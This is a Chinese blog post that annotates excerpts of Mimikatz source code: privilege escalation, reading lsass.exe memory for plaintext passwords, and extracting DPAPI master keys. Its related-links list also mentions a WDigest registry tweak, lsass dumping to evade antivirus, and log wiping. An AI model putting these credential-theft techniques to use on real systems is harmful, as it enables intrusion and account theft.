【源码阅读】Mimikatz一键获取远程终端凭据与获取明文密码修改方法

最新推荐文章于 2023-12-19 11:44:36 发布
最新推荐文章于 2023-12-19 11:44:36 发布
阅读量74 收藏
点赞数
文章标签: qt 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sworld_/article/details/133095183
版权

1、前言

mimikatz框架是非常精妙的,粗浅讲一下修改的思路。

它的模块主要由各个结构体数组组成,根据传入的命令搜索执行相应命令的模块

mimikatz.c 部分代码:

NTSTATUS mimikatz_doLocal(wchar_t * input)
{
        NTSTATUS status = STATUS_SUCCESS;
        // 参数个数定义
        int argc;
        // 获取输入的值,参数个数赋值
        //
        wchar_t ** argv = CommandLineToArgvW(input, &argc), *module = NULL, *command = NULL, *match;
        unsigned short indexModule, indexCommand;
        BOOL moduleFound = FALSE, commandFound = FALSE;
        
        if(argv && (argc > 0))
        {
                if(match = wcsstr(argv[0], L"::"))
                {
                        if(module = (wchar_t *) LocalAlloc(LPTR, (match - argv[0] + 1) * sizeof(wchar_t)))
                        {
                                if((unsigned int) (match + 2 - argv[0]) < wcslen(argv[0]))
                                        //提取::号的后半段字符
                                        command = match + 2;
                                //将argv[0]源内存块的内容复制到module目标内存块。
                                RtlCopyMemory(module, argv[0], (match - argv[0]) * sizeof(wchar_t));
                        }
                }
                else command = argv[0];
                // 索引值为0,如果moduleFound为1且索引值小于模块的数目,循环执行
                for(indexModule = 0; !moduleFound && (indexModule < ARRAYSIZE(mimikatz_modules)); indexModule++)
                        //查找模块
                        if(moduleFound = (!module || (_wcsicmp(module, mimikatz_modules[indexModule]->shortName) == 0)))
                                //查找命令
                                if(command)
                                        for(indexCommand = 0; !commandFound && (indexCommand < mimikatz_modules[indexModule]->nbCommands); indexCommand++)
                                                if(commandFound = _wcsicmp(command, mimikatz_modules[indexModule]->commands[indexCommand].command) == 0)
                                                        //调用相关模块函数
                                                        status = mimikatz_modules[indexModule]->commands[indexCommand].pCommand(argc - 1, argv + 1);

实际调用模块的方式

//模块调用,对应结构体
const KUHL_M * mimikatz_modules[] = {
        &kuhl_m_standard,
        &kuhl_m_crypto,
        &kuhl_m_sekurlsa,
        &kuhl_m_kerberos,
        &kuhl_m_privilege,
        &kuhl_m_process,
        &kuhl_m_service,
        &kuhl_m_lsadump,
        &kuhl_m_ts,
        &kuhl_m_event,
        &kuhl_m_misc,
        &kuhl_m_token,
        &kuhl_m_vault,
        &kuhl_m_minesweeper,
#ifdef NET_MODULE
        &kuhl_m_net,
#endif
        &kuhl_m_dpapi,
        &kuhl_m_busylight,
        &kuhl_m_sysenv,
        &kuhl_m_sid,
        &kuhl_m_iis,
        &kuhl_m_rpc,
};

如果要添加各种变量作为功能模块。在打开解决方案后,global files目录中的globals.h文件可以添加你设置的全局变量,实现全局调用。

提权函数部分

//提权函数调用
NTSTATUS kuhl_m_privilege_debug(int argc, wchar_t * argv[])
{
        return kuhl_m_privilege_simple(SE_DEBUG);
}

主要用更底层的函数,一行API实现进程提权。

NTSTATUS kuhl_m_privilege_simple(ULONG privId)
{
        ULONG previousState;
        NTSTATUS status;
        //提升权限
        //  RtlAdjustPrivilege(SE_DEBUG, TRUE, FALSE, &previousState);
        status = RtlAdjustPrivilege(privId, TRUE, FALSE, &previousState);
        if(NT_SUCCESS(status))
                kprintf(L"Privilege \'%u\' OK\n", privId);
        else
                PRINT_ERROR(L"RtlAdjustPrivilege (%u) %08x\n", privId, status);
        return status;
}

明文获取密码部分

NTSTATUS kuhl_m_sekurlsa_getLogonData(const PKUHL_M_SEKURLSA_PACKAGE * lsassPackages, ULONG nbPackages)
{
        KUHL_M_SEKURLSA_GET_LOGON_DATA_CALLBACK_DATA OptionalData = {lsassPackages, nbPackages};
        return kuhl_m_sekurlsa_enum(kuhl_m_sekurlsa_enum_callback_logondata, &OptionalData);  //明文获取密码2
}

通过调试跟进,发现是从lsass.exe中dump出内存

//根据版本指定调用进程优先级别的函数
        DWORD processRights = PROCESS_VM_READ | ((MIMIKATZ_NT_MAJOR_VERSION < 6) ? PROCESS_QUERY_INFORMATION : PROCESS_QUERY_LIMITED_INFORMATION);
        BOOL isError = FALSE;

        if(!cLsass.hLsassMem)
        {
                status = STATUS_NOT_FOUND;
                if(NT_SUCCESS(lsassLocalHelper->initLocalLib()))
                {
                        if(pMinidumpName)
                        {
                                Type = KULL_M_MEMORY_TYPE_PROCESS_DMP;
                                kprintf(L"Opening : \'%s\' file for minidump...\n", pMinidumpName);
                                hData = CreateFile(pMinidumpName, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
                        }
                        else
                        {
                                Type = KULL_M_MEMORY_TYPE_PROCESS;
                                if(kull_m_process_getProcessIdForName(L"lsass.exe", &pid))
                                        hData = OpenProcess(processRights, FALSE, pid); //打开进程
                                else PRINT_ERROR(L"LSASS process not found (?)\n");
                        }

在NTSTATUS kuhl_m_sekurlsa_enum(PKUHL_M_SEKURLSA_ENUM callback, LPVOID pOptionalData)的回调函数中输出已经获取的明文数据

//回传数据
                                                        retCallback = callback(&sessionData, pOptionalData); //明文密码获取3

明文密码打印位置

BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_logondata(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL LPVOID pOptionalData)
{
        PKUHL_M_SEKURLSA_GET_LOGON_DATA_CALLBACK_DATA pLsassData = (PKUHL_M_SEKURLSA_GET_LOGON_DATA_CALLBACK_DATA) pOptionalData;
        ULONG i;
        //PDWORD sub = NULL;
        if((pData->LogonType != Network)/* && pData->LogonType != UndefinedLogonType*/)
        {
                //if(IsValidSid(pData->pSid) && GetSidSubAuthorityCount(pData->pSid))
                //        sub = GetSidSubAuthority(pData->pSid, 0);

                //if(!sub || (*sub != 90 && *sub != 96))
                //{ 
                        //这个函数负责获取需要打印的数据
                        kuhl_m_sekurlsa_printinfos_logonData(pData);
                       //循环输出
                        for(i = 0; i < pLsassData->nbPackages; i++)
                        {
                                if(pLsassData->lsassPackages[i]->Module.isPresent && lsassPackages[i]->isValid)
                                {
                                        kprintf(L"\t%s :\t", pLsassData->lsassPackages[i]->Name);
                                        pLsassData->lsassPackages[i]->CredsForLUIDFunc(pData);
                                        kprintf(L"\n");
                                }
                        }
                //}
        }
        return TRUE;
}

获取远程会话终端凭据部分

NTSTATUS kuhl_m_sekurlsa_dpapi(int argc, wchar_t * argv[])
{
        kuhl_m_sekurlsa_enum(kuhl_m_sekurlsa_enum_callback_dpapi, NULL); //获取全部用户Guid
        return STATUS_SUCCESS;
}

在BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_dpapi(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL LPVOID pOptionalData)处是存储会话的Guid和MasterKey所在的位置。

if(kull_m_memory_copy(&aBuffer, &aLsass, sizeof(KIWI_MASTERKEY_CACHE_ENTRY)))
                                        {
                                                if(SecEqualLuid(pData->LogonId, &mesCredentials.LogonId))
                                                {
                                                        kprintf(L"\t [%08x]\n\t * GUID      :\t", monNb++);
                                                        kull_m_string_displayGUID(&mesCredentials.KeyUid); //获取Guid

                                                        kprintf(L"\n\t * Time      :\t"); kull_m_string_displayLocalFileTime(&mesCredentials.insertTime);

                                                        if(aKey.address = LocalAlloc(LPTR, mesCredentials.keySize))
                                                        {
                                                                aLsass.address = (PBYTE) aLsass.address + FIELD_OFFSET(KIWI_MASTERKEY_CACHE_ENTRY, key);
                                                                if(kull_m_memory_copy(&aKey, &aLsass, mesCredentials.keySize))
                                                                {
                                                                        (*pData->lsassLocalHelper->pLsaUnprotectMemory)(aKey.address, mesCredentials.keySize);
                                                                        kprintf(L"\n\t * MasterKey :\t"); kull_m_string_wprintf_hex(aKey.address, mesCredentials.keySize, 0);  //获取MasterKey
.....

2、效果图

执行多条命令

批量对比

17bdw学编程
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
删除服务器远程桌面痕迹,清除3389连接后留下的日志,清除3389远程桌面连接记录...
weixin_32512261的博客
07-31 2968
如果我们从一开始打开目标网站开始计算,直到最后断开连接,会在服务器的哪些地方留下日志呢?以Windows2000为例:一.WWW日志,也就是网站日志,位于服务器的%systemroot%system32logfilesw3svc1目录,默认是每天一个日志,记录游客访问网站时的IP地址、动作以及操作系统版本等信息。如果我们通过SQL注入来猜解网站管理员密码,那么管理员通过对网站日志的检查,很容易就能...
mimikatz-master源码
07-22
mimikatz-master
利用procdump+Mimikatz绕过杀软获取Windows明文密码
大河之犬的博客
09-12 582
Mimikatz是从lsass.exe中提取明文密码的,当无法在目标机器上运行Mimikatz时,我们可使用ProcDump工具将系统的lsass.exe进程进行转储,导出dmp文件,拖回到本地后,在本地再利用Mimikatz进行读取。而ProcDump本身是作为一个正常的运维辅助工具使用,并不带毒,所以不会被杀软查杀。
【免杀】mimikatz源码+特征码
zhangshuaiijie的博客
06-23 1760
关于免杀网络上的信息对新手来说相对少很多,不是看不懂就是压根不能用,这也算是一个记录吧,我也不敢保证能不能成功。
利用mimikatz插件获取内网相关信息
weixin_41489908的博客
07-12 408
你宁愿错过也不愿意主动是吗。。。。 ---- 网易云热评 环境:小攻:Kali 2020,ip:192.168.1.133 小受:win7 x86,ip:192.168.1.137 一、生成木马及监听主机参考上篇文章: 二、利用mimikatz获取内网相关信息 1、加载mimikatz meterpreter > load kiwi 2、查看帮助信息 meterpreter > helpkiwi 3、获取用户的hash值 m...
内网渗透测试:获取远程桌面连接记录与 RDP 凭据
qq_53058639的博客
08-20 786
Windows 远程桌面是用于管理 Windows服务器的最广泛使用的工具之一。管理员喜欢使用远程桌面,攻击者也喜欢使用(狗头)。在之前的文章中我们已经介绍了很多攻击远程桌面的方法,本篇文章我们继续来探究。在渗透测试中,RDP远程桌面连接的历史记录不可忽视,根据历史连接记录我们往往能够定位出关键的服务器。并且,当我们发现了某台主机上存在远程桌面的连接记录,我们还可以想办法获取远程桌面登录历史的连接凭据。用于登录RDP 远程桌面会话的凭据通常具有特权,这使它们成为红队操作期间的完美目标。
Mimikatz ERROR kuhl_m_sekurlsa_acquireLSA ; Key import
最新发布
BlackNight168的博客
12-19 568
关键进口” 我尝试了早期版本2.1.1 #17763,并运行sekurlsa::logonpasswords就可以了。原文链接:https://blog.csdn.net/u012206617/article/details/129790597。版权声明:本文为CSDN博主「墨痕诉清风」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。从报错信息看,有一个key导致失败了,查了一下github原地址 issue 找到了答案。1. 确定不是权限的问题,已是最高权限。
一键获取windows密码神器mimikatz咪咪猫
07-23
**标题解析:**“一键获取windows密码神器mimikatz咪咪猫”指的是Mimikatz,这是一个在网络安全领域中著名的开源工具,主要用于提取Windows操作系统的登录密码和其他敏感信息。 **描述详解:**描述中的“mimikatz....
获取Windows明文密码mimikatz2.2-x64.rar
03-19
标题 "获取Windows明文密码mimikatz2.2-x64.rar" 指向的是一个使用Mimikatz工具来提取Windows系统中明文密码的过程。Mimikatz是一款由法国安全研究员Benjamin Delpy开发的开源工具,主要用于系统安全分析,特别是...
mimikatz获取系统密码
03-28
**mimikatz获取系统密码** 在网络安全领域,mimikatz是一款著名的工具,由法国安全研究员Benjamin Delpy开发。它主要用于提取操作系统中的敏感信息,如明文密码、NTLM哈希、kerberos票证等。mimikatz在渗透测试和...
mimikatz2.0和源码
06-26
解压密码:novirus,由于是黑客工具,所以杀毒软件可能会报毒,使用时请添加信任或者暂时关闭实时扫描,另附上项目源代码,供大家分享
法国神器mimikatz源码.rar
03-24
读取windows密码源码,支持win7,win8
cpp-mimikatz是作者学习C并进行Windows安全实验的工具
08-16
mimikatz是作者学习C并进行Windows安全实验的工具
mimikatz2 0 最新 一键
05-04
mimikatz2 0 最新 一键源码编译 32位 64位
MimikatzHoneyToken:这是一个登录脚本,用于检测 Mimikatz 等工具窃取凭据的情况
06-07
MimikatzHoneyToken 这是一个登录脚本,用于检测 Mimikatz 等工具窃取凭据的情况。 此脚本是一个 AutoIT 登录脚本,它以假用户帐户的身份启动 cmd.exe。 它旨在作为 Windows 系统上的登录脚本运行。 将 runas 与 /netonly 结合使用的概念来自 Mark Ba​​ggett 的博客“检测 Mimikatz 在您的网络上的使用”,为 。 当攻击者针对运行此脚本的系统运行诸如 Mimikatz 之类的工具时,他们将看到假帐户,并希望尝试使用它来访问网络上的其他计算机。 这使防御者能够通过查找带有 IDS 的虚假帐户或在 Windows 事件日志中查找失败的登录尝试来捕获此尝试。 建议: 创建 IDS 规则以使用假用户和密码查找流量。 此外,考虑创建 IDS 规则以查找假用户的 NTLM 哈希。 创建日志警报以查找来自该用户帐户的
获取Windows明文密码mimikatz_trunk_2.2.0_20190512.7z
07-07
Windows明文密码获取工具mimikatz_trunk_2.2.0_20190512.7z
mimikatz获取系统管理员账号明文密码工具
02-15
这些信息通常被加密存储,但mimikatz通过直接访问内存来获取明文密码。 2. **DPAPI(数据保护应用程序编程接口)解密**:DPAPI用于加密本地用户的个人数据,mimikatz能够解密DPAPI保护的密钥,获取存储在系统中的...
【已解决】未解决-mimikatz尝试获取win10明文口令报错
热门推荐
高冷的宅先生
04-06 1万+
1.说明 尝试用mimkatz抓取win10明文口令 按照网上的说明,修改了注册表 reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f 使用时注意各种以管理员运行 使用ProcDump和任务管理器lsass都创建转储文件...
内网实验1:getshell、上线提权、抓取主机密码
soldi_er的博客
05-11 2865
文章目录概述实验1:phpmyadmin弱口令+写木马 概述   实验目标:省略外部打点过程,侧重于拿到system权限之后的事宜。   环境情况如下,发现宿主机难以访问Win7服务器,可以用Kali访问。 宿主机:192.168.43.56 Kali攻击机:192.168.43.57 Win7外网服务器:192.168.43.100 实验1:phpmyadmin弱口令+写木马   Kali机访问192.168.43.100/phpMyAdmin,弱口令root/root登录。   phpMyAdmin
使用L0phtCrack获取密码和使用mimikatz直接抓取Windows明文密码区别总结
03-22
因此,L0phtCrack获取密码可能需要一定的时间才能破解成功,而mimikatz则可以直接获取明文密码,速度更快。另外,使用L0phtCrack需要对密码进行破解,可能会被系统检测到并触发安全警报,而使用mimikatz则可以在不...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值